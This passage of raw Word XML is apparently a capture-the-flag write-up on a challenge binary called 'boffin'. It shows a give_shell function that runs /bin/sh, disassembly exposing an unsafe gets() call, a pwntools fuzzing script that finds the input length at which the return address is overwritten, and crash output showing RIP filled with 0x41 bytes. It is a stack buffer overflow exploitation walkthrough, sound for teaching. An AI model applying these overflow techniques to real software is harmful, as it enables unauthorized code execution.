          <w:p w14:paraId="7339DF6D" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E3D3FED" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  system("/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh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5ECA2D27" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>return;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0C25B7E7" w14:textId="0D332B01" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="170EF6F6" w14:textId="1AEDAB4E" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>give_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5303B1CB" w14:textId="6A7F68A0" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function opens a bash shell using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call. Forcing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will result in a shell on the machine running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ultimate goal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of this challenge is to call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> when one of the methods returns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBAF3A6" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method disassembly shows that the stack is prepared to take </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> characters (</w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) of inpu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F5B" w14:paraId="2597FDC5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1DFB676A" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">undefined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0BB0CF9" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32ED8087" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>004006ed</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>CALL       &lt;EXTERNAL</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>&gt;::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>puts  int puts(char * __s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C688D3D" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>004006f2</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>LEA        RAX=&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>name,[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>RBP + -0x20]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31FF40F7" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>004006f6</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">MOV        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>RDI,RAX</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="286C1B79" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>004006f9</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>CALL       &lt;EXTERNAL</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>&gt;::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">gets   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5666BF55" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>004006fe</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>LEA        RAX=&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>name,[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>RBP + -0x20]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC6F992" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>00400702</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">MOV        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>RSI,RAX</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="726119C6" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5077F8FE" w14:textId="1226A290" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>0040071a</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>RET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77FCA8E3" w14:textId="016885E1" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3BE430" w14:textId="58F21860" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">During testing, the program ran normally with </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> characters of input but crashed after </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The following script was written to determine how much input it takes for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to have a segmentation fault (segfaul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F5B" w14:paraId="541F8632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F6B3C14" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>segFuzz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FECC314" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>n = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29049AC0" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">base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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,31)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B19257" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2747DE3C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  <w:t xml:space="preserve">data = base +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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,n)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="784B3EDC" w14:textId="3229B272" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B77188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re.search</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">("exited normally", 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r>
              <w:t>p.recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()))):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D8B791A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</w:r>
            <w:r>
              <w:tab/>
              <w:t>n += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB19650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</w:r>
            <w:r>
              <w:tab/>
              <w:t>print(n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49E059EC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  <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EE68AED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</w:r>
            <w:r>
              <w:tab/>
              <w:t>print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  <w:p w14:paraId="2D6C77EC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"(gdb)")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354159B3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info registers rip")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271AEE03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</w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">ln = 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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F29B597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</w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">l = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>re.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("\s+", ln)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E284D28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</w:r>
            <w:r>
              <w:tab/>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>l[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B24AF34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</w:r>
            <w:r>
              <w:tab/>
              <w:t>if n == 20:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09623629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.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C47553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</w:r>
            <w:r>
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D5ADFE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n +=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E80D5FF" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B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print(n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A8C5180" w14:textId="1F9E609F" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>print(data)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="586C1F2E" w14:textId="1FF772F2" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAED4B7" w14:textId="15505312" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The script results show that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> crashed with a Bus Error after </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> characters of input. An input of </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> characters or more caused the program to crash with a segfaul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F5B" w14:paraId="3609029F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6EFEA56C" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B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3A1D0769" w14:textId="4E7EE629" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Boffin_</w:t>
            </w:r>
            <w:r>
              <w:t>Pwn</w:t>
            </w:r>
            <w:r>
              <w:t>.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5A6D32" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571C23F4" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9C2D2A" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B7DA92F" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED02C8B" w14:textId="2A96B606" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGBUS, Bus error.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B43276" w14:textId="76DDA764" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x7ffff7df2600</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2100ADB0" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32140417" w14:textId="306BAF53" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7104238C" w14:textId="48206328" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x7ffff7df0041</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D4A9BF" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6780CFD6" w14:textId="1D88C03D" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788A6F67" w14:textId="16A9F38D" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x7ffff7004141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E0BBCD" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55918B34" w14:textId="10F13780" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588C9E20" w14:textId="1E2EE8DB" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x7f0041414141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259B06D2" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47616DEC" w14:textId="08A7D954" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC3005A" w14:textId="4FC70402" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x4141414141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF1631F" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="037481CB" w14:textId="20F1A608" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C7E01A" w14:textId="21E83EFF" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x414141414141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63ED23A1" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B7CBDB1" w14:textId="65C5779A" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB50BC8" w14:textId="4BC359B6" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x414141414141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029203B4" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A4B03C" w14:textId="20556872" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4196174F" w14:textId="0794A247" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00555F5B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00555F5B">
              <w:t>0x40071a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12B66E33" w14:textId="4DD84A0A" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C25DF" w14:textId="68777F4E" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">As the input value grew in length, the data appeared to be overwriting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="BoxCodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
